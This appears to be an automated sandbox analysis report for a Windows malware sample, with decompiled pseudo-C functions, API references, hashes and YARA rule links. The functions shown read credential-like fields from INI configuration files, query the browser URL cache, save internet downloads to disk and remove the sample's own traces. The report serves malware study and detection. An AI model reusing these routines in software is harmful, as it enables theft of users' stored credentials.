								_t78 = GetPrivateProfileStringW(_v648,  &_v600, 0, _t111, 0xff,  &_v528);
								__eflags = _t78;
								if(_t78 != 0) {
									_t81 = GetPrivateProfileIntW(_v648,  &_v612, 0x15,  &_v528);
									_v640 = _t81;
									__eflags = _t81 - 1 - 0xfffe;
									if(_t81 - 1 <= 0xfffe) {
										_t112 =  &(_t111[0xff]);
										_t85 = GetPrivateProfileStringW(_v648,  &_v628, 0, _t112, 0xff,  &_v528);
										__eflags = _t85;
										if(_t85 != 0) {
											_t33 =  &(_t112[0xff]); // 0x0
											_t124 = _t33;
											_t88 = GetPrivateProfileStringW(_v648,  &_v620, 0, _t33, 0xff,  &_v528);
											__eflags = _t88;
											if(_t88 != 0) {
												_t89 = E004079D4(_t124);
												__eflags = _t89;
												if(_t89 > 0) {
													_t125 =  &_v568;
													_t90 = 0x55;
													E00405B00(_t90,  &_v568);
													_push(_v640);
													_t38 =  &(_t112[0xff]); // 0x0
													_push(_v644);
													_push(_t112);
													_t113 = _v636;
													_t94 = E00407B78(_t125, 0x311, _v636, _t125);
													_t129 = _t129 + 0x14;
													__eflags = _t94;
													if(_t94 > 0) {
														_t126 = _a4;
														_t95 = E00407279(_t94, _t126, _t113);
														__eflags = _t95;
														if(_t95 != 0) {
															_t42 = _t126 + 4;
															 *_t42 =  &(( *(_t126 + 4))[0]);
															__eflags =  *_t42;
														}
													}
												}
											}
										}
									}
								}
							}
							goto L18;
						}
						E00406E85(_v644);
						_t117 = _v636;
					}
					goto L20;
				} else {
					E004186AC(_t132,  &_v524, _a4);
					goto L21;
				}
			}

0x004186ea
0x00418708
0x004188fe
0x00418906
0x00418906
0x0041870e
0x00418711
0x00418732
0x00418736
0x0041873a
0x0041873c
0x00000000
0x00000000
0x00418759
0x0041875b
0x0041875d
0x004188f8
0x004188f9
0x00000000
0x004188f9
0x00418763
0x00418768
0x0041876d
0x0041876f
0x00000000
0x00000000
0x0041877f
0x00418781
0x00418785
0x00418787
0x0041878d
0x00418795
0x00418799
0x004187a1
0x004187a2
0x004187ad
0x004187ae
0x004187b9
0x004187ba
0x004187c5
0x004187c6
0x004187d1
0x004187d2
0x004187d7
0x004188d4
0x004188da
0x004188df
0x004188e3
0x004188e5
0x004187d9
0x004187dd
0x004187e6
0x004187ec
0x004187ee
0x0041880e
0x00418810
0x00418812
0x0041882b
0x00418831
0x00418836
0x0041883b
0x0041884a
0x0041885c
0x0041885e
0x00418860
0x0041886b
0x0041886b
0x0041887d
0x0041887f
0x00418881
0x00418885
0x0041888a
0x0041888c
0x00418890
0x00418894
0x00418895
0x0041889a
0x0041889e
0x004188a4
0x004188ae
0x004188af
0x004188b6
0x004188bb
0x004188be
0x004188c0
0x004188c2
0x004188c8
0x004188cd
0x004188cf
0x004188d1
0x004188d1
0x004188d1
0x004188d1
0x004188cf
0x004188c0
0x0041888c
0x00418881
0x00418860
0x0041883b
0x00418812
0x00000000
0x004187ee
0x004188ef
0x004188f4
0x004188f4
0x00000000
0x00418713
0x0041871e
0x00000000
0x0041871e

APIs

Part of subcall function 0040C70A: PathCombineW.SHLWAPI(?,)A,?,00412909,?,?), ref: 0040C729

GetPrivateProfileStringW.KERNEL32 ref: 00418759
StrStrIW.SHLWAPI(?,?), ref: 004187E6
GetPrivateProfileStringW.KERNEL32 ref: 0041880E
GetPrivateProfileIntW.KERNEL32 ref: 0041882B
GetPrivateProfileStringW.KERNEL32 ref: 0041885C

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: PrivateProfile$String$CombinePath
String ID:
API String ID: 2134968610-0
Opcode ID: d17e0efc3d2463432757784f7b225a6ce6cf0974181a0f56db8cb5c044e453a8
Instruction ID: 62aeb255c685669e1bc60132f8fd86926532cf79eb21e9a57f2d68ac66b44a0a
Opcode Fuzzy Hash: d17e0efc3d2463432757784f7b225a6ce6cf0974181a0f56db8cb5c044e453a8
Instruction Fuzzy Hash: A351A732504306ABD710EB65CC45FEBB7E8EF84704F40092EB998E7191DB38E945C79A

Uniqueness

Uniqueness Score: -1.00%

Function 0041C621, Relevance: 9.2, APIs: 6, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041C621(void* __eflags, char* _a4, struct _GOPHER_FIND_DATAA _a8, void _a12, struct _GOPHER_FIND_DATAA _a16) {
				char _v5;
				char _v12;
				signed int _v16;
				char _v20;
				char _v24;
				long _v28;
				void* __edi;
				void* __esi;
				signed int _t55;
				void* _t58;
				struct _GOPHER_FIND_DATAA _t59;
				intOrPtr _t60;
				struct _GOPHER_FIND_DATAA _t61;
				struct _GOPHER_FIND_DATAA _t62;
				signed int _t71;
				struct _GOPHER_FIND_DATAA _t79;
				struct _GOPHER_FIND_DATAA _t84;
				int _t89;
				struct _GOPHER_FIND_DATAA _t91;
				void* _t96;
				intOrPtr* _t99;
				struct _GOPHER_FIND_DATAA _t103;
				struct _GOPHER_FIND_DATAA _t107;

				_v16 = _v16 | 0xffffffff;
				EnterCriticalSection(0x424004);
				_t99 = _a4;
				_t55 = E0041BE86( *_t99);
				if(_t55 == 0xffffffff) {
					L33:
					LeaveCriticalSection(0x424004);
					return _v16;
				}
				_t58 = _t55 * 0x24 +  *0x42401c;
				if( *((intOrPtr*)(_t58 + 0x10)) <= 0) {
					goto L33;
				}
				_t96 = _t58;
				if( *((intOrPtr*)(_t96 + 0x10)) != 1 || ( *( *(_t96 + 0xc)) & 0x00000003) == 0) {
					_t59 = _a16;
					__eflags = _t59;
					if(_t59 != 0) {
						 *_t59 =  *_t59 & 0x00000000;
						__eflags =  *_t59;
					}
					__eflags =  *((intOrPtr*)(_t96 + 0x18)) - 0xffffffff;
					if(__eflags != 0) {
						L22:
						_t60 =  *((intOrPtr*)(_t96 + 0x18));
						__eflags = _t60 - 0xffffffff;
						if(_t60 != 0xffffffff) {
							__eflags = _v16 - 0xffffffff;
							if(_v16 == 0xffffffff) {
								_t61 = _t60 -  *(_t96 + 0x1c);
								__eflags = _t61;
								_t103 = _t61;
								if(_t61 != 0) {
									__eflags = _a8;
									if(_a8 == 0) {
										_a12 = E0040820A(0x2000, 0x1000);
									}
									__eflags = _a12 - _t103;
									_t103 =  <  ? _a12 : _t103;
									__eflags = _a8;
									if(_a8 != 0) {
										E00406EC1(_a8,  *((intOrPtr*)(_t96 + 0x14)) +  *(_t96 + 0x1c), _t103);
										_t50 = _t96 + 0x1c;
										 *_t50 =  *(_t96 + 0x1c) + _t103;
										__eflags =  *_t50;
									}
								}
								_t62 = _a16;
								__eflags = _t62;
								if(_t62 != 0) {
									 *_t62 = _t103;
								}
								_v16 = 1;
							}
						}
						goto L32;
					}
					LeaveCriticalSection(0x424004);
					_v5 = E0041C508( &_v20, __eflags,  *_t99,  *((intOrPtr*)(_t96 + 4)),  &_v12);
					EnterCriticalSection(0x424004);
					__eflags = _v5;
					if(_v5 == 0) {
						L21:
						_t37 =  &_v16;
						 *_t37 = _v16 & 0x00000000;
						__eflags =  *_t37;
						SetLastError(0x2ee4);
						goto L22;
					}
					_t105 =  *_a4;
					_t71 = E0041BE86( *_a4);
					__eflags = _t71 - 0xffffffff;
					if(_t71 == 0xffffffff) {
						E00406E85(_v12);
						goto L21;
					}
					_t96 = _t71 * 0x24 +  *0x42401c;
					_t101 = E00408FBB( &_v24, _t105);
					_t79 = E0041B69B( *((intOrPtr*)(_t96 + 0x10)),  *(_t96 + 0xc), _t75,  &_v12,  &_v20);
					__eflags = _t79;
					if(_t79 == 0) {
						L19:
						E00406E85(_t101);
						 *((intOrPtr*)(_t96 + 0x14)) = _v12;
						 *((intOrPtr*)(_t96 + 0x18)) = _v20;
						goto L22;
					}
					_t84 = E004070C5(_v24, 0, _t101);
					_a4 = _t84;
					__eflags = _t84;
					if(_t84 == 0) {
						goto L19;
					}
					_v28 = 0x1000;
					_t107 = E00406E55(0x1000);
					__eflags = _t107;
					if(_t107 == 0) {
						L18:
						E00406E85(_a4);
						goto L19;
					}
					 *_t107 = 0x50;
					_t89 = GetUrlCacheEntryInfoW(_a4, _t107,  &_v28);
					__eflags = _t89;
					if(_t89 != 0) {
						_t91 =  *(_t107 + 8);
						__eflags = _t91;
						if(_t91 != 0) {
							__eflags =  *_t91;
							if( *_t91 != 0) {
								E0040C035(_t91, _v12, _v20);
							}
						}
					}
					E00406E85(_t107);
					goto L18;
				} else {
					 *_t99 =  *((intOrPtr*)(_t96 + 0x20));
					L32:
					goto L33;
				}
			}

0x0041c627
0x0041c632
0x0041c638
0x0041c63d
0x0041c645
0x0041c7f0
0x0041c7f5
0x0041c801
0x0041c801
0x0041c64e
0x0041c658
0x00000000
0x00000000
0x0041c65f
0x0041c665
0x0041c679
0x0041c67c
0x0041c67e
0x0041c680
0x0041c680
0x0041c680
0x0041c683
0x0041c687
0x0041c792
0x0041c792
0x0041c795
0x0041c798
0x0041c79a
0x0041c79e
0x0041c7a0
0x0041c7a0
0x0041c7a3
0x0041c7a5
0x0041c7a7
0x0041c7ab
0x0041c7bc
0x0041c7bc
0x0041c7bf
0x0041c7c2
0x0041c7c6
0x0041c7ca
0x0041c7d7
0x0041c7dc
0x0041c7dc
0x0041c7dc
0x0041c7dc
0x0041c7ca
0x0041c7df
0x0041c7e2
0x0041c7e4
0x0041c7e6
0x0041c7e6
0x0041c7e8
0x0041c7e8
0x0041c79e
0x00000000
0x0041c798
0x0041c695
0x0041c6af
0x0041c6b2
0x0041c6b8
0x0041c6bc
0x0041c783
0x0041c783
0x0041c783
0x0041c783
0x0041c78c
0x00000000
0x0041c78c
0x0041c6c5
0x0041c6c7
0x0041c6cc
0x0041c6cf
0x0041c77e
0x00000000
0x0041c77e
0x0041c6e2
0x0041c6ec
0x0041c6fa
0x0041c6ff
0x0041c701
0x0041c767
0x0041c768
0x0041c770
0x0041c776
0x00000000
0x0041c776
0x0041c709
0x0041c70e
0x0041c711
0x0041c713
0x00000000
0x00000000
0x0041c71a
0x0041c722
0x0041c724
0x0041c726
0x0041c75f
0x0041c762
0x00000000
0x0041c762
0x0041c730
0x0041c736
0x0041c73c
0x0041c73e
0x0041c740
0x0041c743
0x0041c745
0x0041c747
0x0041c74b
0x0041c754
0x0041c754
0x0041c74b
0x0041c745
0x0041c75a
0x00000000
0x0041c66f
0x0041c672
0x0041c7ef
0x00000000
0x0041c7ef

APIs

EnterCriticalSection.KERNEL32(00424004), ref: 0041C632
LeaveCriticalSection.KERNEL32(00424004), ref: 0041C695
EnterCriticalSection.KERNEL32(00424004), ref: 0041C6B2
GetUrlCacheEntryInfoW.WININET(?,00000000,000000FF), ref: 0041C736
SetLastError.KERNEL32(00002EE4), ref: 0041C78C
LeaveCriticalSection.KERNEL32(00424004), ref: 0041C7F5

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterLeave$CacheEntryErrorInfoLast
String ID:
API String ID: 3653105453-0
Opcode ID: 11415392dda88cff2d4655ebc6dcec223bdd1e5af30901cbcecc69e2af5d56c5
Instruction ID: 0589474c1f5af7b14ed4e4a073bde7b2d98ec1f16d85406bdf3d2da42e77361a
Opcode Fuzzy Hash: 11415392dda88cff2d4655ebc6dcec223bdd1e5af30901cbcecc69e2af5d56c5
Instruction Fuzzy Hash: BF517A35940206AFCB109F65CCC4BDE7BA4AF04364F04416AF925AB2E1D7B8D991CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 004182ED, Relevance: 9.1, APIs: 6, Instructions: 148
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E004182ED(void* __edx, void* __eflags, WCHAR* _a4, intOrPtr _a8) {
				WCHAR* _v8;
				WCHAR* _v12;
				short* _v16;
				WCHAR* _v20;
				short _v32;
				short _v48;
				short _v68;
				short _v88;
				short _v112;
				char _v144;
				void* __edi;
				void* __esi;
				WCHAR* _t40;
				long _t41;
				void* _t48;
				void* _t50;
				void* _t52;
				void* _t54;
				void* _t56;
				WCHAR* _t61;
				WCHAR* _t64;
				void* _t72;
				void* _t76;
				WCHAR* _t83;
				WCHAR* _t84;
				WCHAR* _t86;
				intOrPtr _t96;
				void* _t97;

				_t81 = __edx;
				_t40 = E00406E55(0x1fffe);
				_t86 = _t40;
				_v20 = _t86;
				if(_t86 == 0) {
					return _t40;
				}
				_t41 = GetPrivateProfileStringW(0, 0, 0, _t86, 0xffff, _a4);
				if(_t41 <= 0) {
					L17:
					return E00406E85(_t86);
				}
				_t3 = _t41 + 1; // 0x1
				if(E00407D35(_t86, _t3) == 0) {
					goto L17;
				}
				_t83 = E00406E55(0xc08);
				_v12 = _t83;
				if(_t83 == 0) {
					goto L17;
				} else {
					_t5 =  &(_t83[0x2fd]); // 0x5fa
					_v16 = _t5;
					_v8 = _t86;
					_t48 = 0x65;
					E00405B00(_t48,  &_v112);
					_t50 = 0x66;
					E00405B00(_t50,  &_v48);
					_t52 = 0x67;
					E00405B00(_t52,  &_v32);
					_t54 = 0x68;
					E00405B00(_t54,  &_v88);
					_t56 = 0x69;
					E00405B00(_t56,  &_v68);
					goto L6;
					L15:
					_t61 = E00407D71(_v8, 1);
					_v8 = _t61;
					if(_t61 != 0) {
						_t83 = _v12;
						L6:
						if(StrStrIW(_v8,  &_v112) == 0) {
							_t64 = StrStrIW(_v8,  &_v48);
							if(_t64 == 0 && GetPrivateProfileStringW(_v8,  &_v32, _t64, _t83, 0xff, _a4) != 0) {
								_t84 =  &(_t83[0xff]);
								if(GetPrivateProfileStringW(_v8,  &_v88, 0, _t84, 0xff, _a4) != 0) {
									_t26 =  &(_t84[0xff]); // 0x0
									_t94 = _t26;
									if(GetPrivateProfileStringW(_v8,  &_v68, 0, _t26, 0xff, _a4) != 0 && E00418182(_t81, _t94) > 0) {
										_t95 =  &_v144;
										_t72 = 0x56;
										E00405B00(_t72,  &_v144);
										_push(_v12);
										_t30 =  &(_t84[0xff]); // 0x0
										_push(_t84);
										_t85 = _v16;
										_t81 = 0x307;
										_t76 = E00407B78(_t95, 0x307, _v16, _t95);
										_t97 = _t97 + 0x10;
										if(_t76 > 0) {
											_t96 = _a8;
											if(E00407279(_t76, _t96, _t85) != 0) {
												 *((intOrPtr*)(_t96 + 4)) =  *((intOrPtr*)(_t96 + 4)) + 1;
											}
										}
									}
								}
							}
						}
						goto L15;
					} else {
						E00406E85(_v12);
						_t86 = _v20;
						goto L17;
					}
				}
			}

0x004182ed
0x004182fe
0x00418303
0x00418307
0x0041830c
0x0041848d
0x0041848d
0x00418324
0x00418328
0x00418483
0x00000000
0x00418484
0x0041832e
0x0041833a
0x00000000
0x00000000
0x0041834a
0x0041834c
0x00418351
0x00000000
0x00418357
0x00418357
0x0041835f
0x00418362
0x00418368
0x00418369
0x00418373
0x00418374
0x0041837e
0x0041837f
0x00418389
0x0041838a
0x00418394
0x00418395
0x0041839a
0x00418463
0x00418468
0x0041846d
0x00418472
0x0041839c
0x0041839f
0x004183b0
0x004183bd
0x004183c1
0x004183e6
0x004183fb
0x00418404
0x00418404
0x00418415
0x00418423
0x00418429
0x0041842a
0x0041842f
0x00418432
0x00418439
0x0041843a
0x00418440
0x00418445
0x0041844a
0x0041844f
0x00418451
0x0041845e
0x00418460
0x00418460
0x0041845e
0x0041844f
0x00418415
0x004183fb
0x004183c1
0x00000000
0x00418478
0x0041847b
0x00418480
0x00000000
0x00418480
0x00418472

APIs

GetPrivateProfileStringW.KERNEL32 ref: 00418324

Part of subcall function 00406E55: HeapAlloc.KERNEL32(00000008,-00000004,00408623,00000000,?,?,?,004127CC,00000000,00412CA6,?,?,00000000), ref: 00406E66

StrStrIW.SHLWAPI(00000001,?), ref: 004183AC
StrStrIW.SHLWAPI(00000001,?), ref: 004183BD
GetPrivateProfileStringW.KERNEL32 ref: 004183D9
GetPrivateProfileStringW.KERNEL32 ref: 004183F7
GetPrivateProfileStringW.KERNEL32 ref: 00418411

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: PrivateProfileString$AllocHeap
String ID:
API String ID: 2479592106-0
Opcode ID: 63a991a1d009bc6c761cfb6eae8322efa6e3351913f8c7256ac19bcf3f5a83de
Instruction ID: b2cb8b91b6e7ae30bddef1c211a46eacf71aa0220d616f6ed6c87ea66213bbff
Opcode Fuzzy Hash: 63a991a1d009bc6c761cfb6eae8322efa6e3351913f8c7256ac19bcf3f5a83de
Instruction Fuzzy Hash: E7414332D0021ABADF10ABA5CC41EEFB779EF44754F14402AB904B7291DF39AE55CB94

Uniqueness

Uniqueness Score: -1.00%

Function 004164CE, Relevance: 9.1, APIs: 6, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E004164CE(void* __ebx, void* __ecx, void* __eflags) {
				char _v1168;
				char _v1668;
				char _v1680;
				short _v1688;
				char _v2192;
				short _v2208;
				char _v2720;
				char _v2728;
				char _v2992;
				char _v3072;
				void* __edi;
				void* __esi;
				void* _t34;
				WCHAR* _t50;
				WCHAR* _t51;
				WCHAR* _t52;
				void* _t65;

				_t65 = __eflags;
				_t46 = __ecx;
				_t50 =  &_v1668;
				E004131E9(__ecx, _t50, 1);
				PathRemoveFileSpecW(_t50);
				_t51 =  &_v2192;
				E004131E9(_t46, _t51, 2);
				PathRemoveFileSpecW(_t51);
				 *0x423968 =  *0x423968 | 0x00000002;
				_push(0);
				E00415A14();
				E004157F3(_t46, _t65);
				E0040C4F3( &_v1680, _t65);
				E0040C4F3(_t51, _t65);
				_t52 =  &_v2720;
				E004131E9(_t51, _t52, 3);
				SHDeleteKeyW(0x80000001, _t52);
				CharToOemW( &_v1688,  &_v2728);
				CharToOemW( &_v2208,  &_v2992);
				_t53 =  &_v3072;
				_t34 = 7;
				E00405ACA(_t34,  &_v3072);
				_push( &_v2992);
				_push( &_v2728);
				_push( &_v2992);
				_push( &_v2728);
				if(E00407BBC( &_v3072, 0x474,  &_v1168, _t53) > 0) {
					E00408945(__ebx, 0x474,  &_v1168);
				}
				if( *0x423e30 == 0xffffffff) {
					ExitProcess(0);
				}
				return 1;
			}

0x004164ce
0x004164ce
0x004164de
0x004164e5
0x004164f3
0x004164f7
0x004164fe
0x00416506
0x00416508
0x0041650f
0x00416511
0x00416516
0x00416522
0x00416529
0x00416530
0x00416537
0x00416544
0x00416560
0x0041656f
0x00416573
0x00416577
0x00416578
0x00416581
0x00416589
0x0041658e
0x00416596
0x004165b0
0x004165b5
0x004165b5
0x004165c1
0x004165c5
0x004165c5
0x004165d2

APIs

Part of subcall function 004131E9: PathRenameExtensionW.SHLWAPI(?,.dat,?,004239C8,00000000,00000032,?,77E49EB0,00000000), ref: 00413262

PathRemoveFileSpecW.SHLWAPI(?,00000001), ref: 004164F3
PathRemoveFileSpecW.SHLWAPI(?,00000002), ref: 00416506

Part of subcall function 00415A14: SetEvent.KERNEL32(00416516,00000000), ref: 00415A1A
Part of subcall function 00415A14: WaitForSingleObject.KERNEL32(?,000000FF), ref: 00415A2D

Part of subcall function 004157F3: SHDeleteValueW.SHLWAPI(80000001,?,?,FF220829,?,00000000,?,750D46D0), ref: 00415830
Part of subcall function 004157F3: Sleep.KERNEL32(000001F4), ref: 0041583F
Part of subcall function 004157F3: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?), ref: 00415855

Part of subcall function 0040C4F3: FindFirstFileW.KERNEL32(?,?,?), ref: 0040C524
Part of subcall function 0040C4F3: FindNextFileW.KERNEL32(00000000,?), ref: 0040C57F
Part of subcall function 0040C4F3: FindClose.KERNEL32(00000000), ref: 0040C58A
Part of subcall function 0040C4F3: SetFileAttributesW.KERNEL32(?,00000080,?), ref: 0040C596
Part of subcall function 0040C4F3: RemoveDirectoryW.KERNEL32(?,?,00000080,?), ref: 0040C59D

SHDeleteKeyW.SHLWAPI(80000001,?,00000003,00000000), ref: 00416544
CharToOemW.USER32 ref: 00416560
CharToOemW.USER32 ref: 0041656F
ExitProcess.KERNEL32 ref: 004165C5

Part of subcall function 00408945: CharToOemW.USER32 ref: 00408975
Part of subcall function 00408945: GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104,?,?,00000000,00000000), ref: 004089F9

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: File$CharFindPathRemove$DeleteSpec$AttributesCloseDirectoryEnvironmentEventExitExtensionFirstNextObjectOpenProcessRenameSingleSleepValueVariableWait
String ID:
API String ID: 1572960351-0
Opcode ID: bb249a434cee88e5a10a7a2ca2d4e1c874a2732d5624156f8528c0c962c0acae
Instruction ID: 44527f5a0f526cb38b148757ac9eb27a8bdc7527acb5191ebe7d9583583308b9
Opcode Fuzzy Hash: bb249a434cee88e5a10a7a2ca2d4e1c874a2732d5624156f8528c0c962c0acae
Instruction Fuzzy Hash: 1621DB72608344ABC230EBA5DC46FDB77EDEBC4315F00052BB548E7191DB79A605CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00408CC7, Relevance: 9.1, APIs: 6, Instructions: 74
filesynchronizationnetworkCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408CC7(void* _a4, WCHAR* _a8, intOrPtr _a12, void* _a16) {
				char _v5;
				long _v12;
				struct _OVERLAPPED* _v16;
				void* _v20;
				long _v24;
				void* _t28;
				long _t37;
				void* _t41;

				_v5 = 0;
				_t41 = CreateFileW(_a8, 0x40000000, 1, 0, 2, 0x80, 0);
				if(_t41 == 0xffffffff) {
					L15:
					return _v5;
				}
				_t28 = E00406E55(0x1000);
				_v20 = _t28;
				if(_t28 == 0) {
					L13:
					CloseHandle(_t41);
					if(_v5 == 0) {
						E0040C1E0(_a8);
					}
					goto L15;
				}
				_v16 = 0;
				while(_a16 == 0 || WaitForSingleObject(_a16, 0) == 0x102) {
					if(InternetReadFile(_a4, _v20, 0x1000,  &_v12) == 0) {
						break;
					}
					if(_v12 == 0) {
						FlushFileBuffers(_t41);
						_v5 = 1;
						break;
					}
					if(WriteFile(_t41, _v20, _v12,  &_v24, 0) == 0) {
						break;
					}
					_t37 = _v12;
					if(_t37 != _v24) {
						break;
					}
					_v16 = _v16 + _t37;
					if(_v16 <= _a12) {
						continue;
					}
					break;
				}
				E00406E85(_v20);
				goto L13;
			}

0x00408ce4
0x00408ced
0x00408cf2
0x00408d92
0x00408d98
0x00408d98
0x00408cfd
0x00408d02
0x00408d07
0x00408d7e
0x00408d7f
0x00408d88
0x00408d8d
0x00408d8d
0x00000000
0x00408d88
0x00408d09
0x00408d0c
0x00408d39
0x00000000
0x00000000
0x00408d3e
0x00408d6c
0x00408d72
0x00000000
0x00408d72
0x00408d54
0x00000000
0x00000000
0x00408d56
0x00408d5c
0x00000000
0x00000000
0x00408d5e
0x00408d67
0x00000000
0x00000000
0x00000000
0x00408d69
0x00408d79
0x00000000

APIs

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,?,00000000,?,?,?,?,00000000), ref: 00408CE7
WaitForSingleObject.KERNEL32(?,00000000), ref: 00408D15
InternetReadFile.WININET(00001000,?,00001000,?), ref: 00408D31
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00408D4C
FlushFileBuffers.KERNEL32(00000000), ref: 00408D6C
CloseHandle.KERNEL32(00000000), ref: 00408D7F

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: File$BuffersCloseCreateFlushHandleInternetObjectReadSingleWaitWrite
String ID:
API String ID: 3509176705-0
Opcode ID: bdb3deb61500ce559e6487ec8c9222708f49d8a4f7dc51fcd394e5bafa4a40d0
Instruction ID: d9fe38959f2dd121f5a8e5f81586a47dc4f922a8085ebbef021080fa2b8a635c
Opcode Fuzzy Hash: bdb3deb61500ce559e6487ec8c9222708f49d8a4f7dc51fcd394e5bafa4a40d0
Instruction Fuzzy Hash: 8F217A31900249BFDF119FA0DE84FAE7B79AF15340F00867AF591B11E0EB798D549B29

Uniqueness

Uniqueness Score: -1.00%

Function 0040B5BA, Relevance: 9.1, APIs: 6, Instructions: 72
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E0040B5BA(int __ecx, intOrPtr* __edx, struct tagPOINT _a4, signed int _a8) {
				intOrPtr* _v8;
				long _v12;
				struct HWND__* _v16;
				int _v20;
				struct HWND__* _v24;
				long _t24;
				struct HWND__* _t33;
				intOrPtr* _t44;

				_push(_a8);
				_t44 = __edx;
				_v8 = __edx;
				_v20 = __ecx;
				_t33 = WindowFromPoint(_a4.x);
				if(_t33 != 0) {
					if(SendMessageTimeoutW(_t33, 0x84, 0, (_a8 & 0x0000ffff) << 0x00000010 | _a4.x & 0x0000ffff, 2, _v20,  &_v12) != 0) {
						_t24 = _v12;
						if(_t24 != 0xffffffff) {
							if(_t44 != 0) {
								 *_t44 = _t24;
							}
						} else {
							_v16 = _t33;
							SetWindowLongW(_t33, 0xfffffff0, GetWindowLongW(_t33, 0xfffffff0) | 0x08000000);
							_t33 = E0040B5BA(_v20, _v8, _a4, _a8);
							SetWindowLongW(_v24, 0xfffffff0, GetWindowLongW(_v24, 0xfffffff0) & 0xf7ffffff);
						}
					} else {
						_t33 = 0;
					}
				}
				return _t33;
			}

0x0040b5c6
0x0040b5c9
0x0040b5ce
0x0040b5d2
0x0040b5dc
0x0040b5e0
0x0040b60f
0x0040b615
0x0040b61c
0x0040b66d
0x0040b66f
0x0040b66f
0x0040b61e
0x0040b627
0x0040b63c
0x0040b657
0x0040b667
0x0040b667
0x0040b611
0x0040b611
0x0040b611
0x0040b60f
0x0040b679

APIs

WindowFromPoint.USER32(?,?), ref: 0040B5D6
SendMessageTimeoutW.USER32 ref: 0040B607
GetWindowLongW.USER32(00000000,000000F0), ref: 0040B62B
SetWindowLongW.USER32 ref: 0040B63C
GetWindowLongW.USER32(?,000000F0), ref: 0040B659
SetWindowLongW.USER32 ref: 0040B667

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Long$FromMessagePointSendTimeout
String ID:
API String ID: 2645164282-0
Opcode ID: 445d99de79672755f5aa46e7022dbbcf955507ab8ac19f69d707e79fc107a6cf
Instruction ID: fd3a74ec86d6244d727f308fc5769cb1ade06b0b8291bd410265d41c021234f9
Opcode Fuzzy Hash: 445d99de79672755f5aa46e7022dbbcf955507ab8ac19f69d707e79fc107a6cf
Instruction Fuzzy Hash: 5121F371108315ABD7009F64CC40E6B7B98EB84774F200B3AFDA0A23E1D775D8149BD9

Uniqueness

Uniqueness Score: -1.00%

Function 0040C09A, Relevance: 9.1, APIs: 6, Instructions: 68
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E0040C09A(signed int __eax, void* __ecx, void** __esi, long _a4) {
				intOrPtr _v8;
				long _v12;
				void* _t19;
				void* _t20;
				long _t22;
				void* _t23;

				_t33 = __esi;
				asm("sbb eax, eax");
				_t19 = CreateFileW(_a4, 0x80000000,  ~(__eax & 2) & 0x00000006 | 0x00000001, 0, 3, 0, 0);
				__esi[2] = _t19;
				if(_t19 == 0xffffffff) {
					L11:
					_t20 = 0;
				} else {
					__imp__GetFileSizeEx(_t19,  &_v12);
					if(_t19 == 0 || _v8 != 0) {
						L10:
						CloseHandle(_t33[2]);
						goto L11;
					} else {
						_t22 = _v12;
						__esi[1] = _t22;
						if(_t22 != 0) {
							_t23 = VirtualAlloc(0, _t22, 0x3000, 4);
							 *__esi = _t23;
							if(_t23 == 0) {
								goto L10;
							} else {
								if(ReadFile(__esi[2], _t23, __esi[1],  &_a4, 0) == 0 || _a4 != __esi[1]) {
									VirtualFree( *_t33, 0, 0x8000);
									goto L10;
								} else {
									goto L5;
								}
							}
						} else {
							 *__esi = 0;
							L5:
							_t20 = 1;
						}
					}
				}
				return _t20;
			}

0x0040c09a
0x0040c0ad
0x0040c0bf
0x0040c0c5
0x0040c0cb
0x0040c13b
0x0040c13b
0x0040c0cd
0x0040c0d2
0x0040c0da
0x0040c132
0x0040c135
0x00000000
0x0040c0e1
0x0040c0e1
0x0040c0e4
0x0040c0e9
0x0040c0fa
0x0040c100
0x0040c104
0x00000000
0x0040c106
0x0040c11a
